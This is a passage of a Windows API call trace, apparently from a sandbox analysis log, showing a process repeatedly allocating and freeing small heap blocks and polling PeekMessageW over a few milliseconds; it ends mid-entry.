RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.516] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.516] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.516] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.516] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.516] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.517] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.517] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.517] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.517] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.517] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.518] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.518] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.518] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.518] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.518] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.519] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.519] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.519] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.519] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.519] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.520] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.520] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.520] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.520] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.520] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.521] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.521] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.521] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.521] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.521] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdf350 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda708 | out: hHeap=0xbc0000) returned 1 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.522] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.522] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.522] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.522] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01958 [0257.522] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01958 | out: hHeap=0xbc0000) returned 1 [0257.522] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.522] RtlAllocateHeap 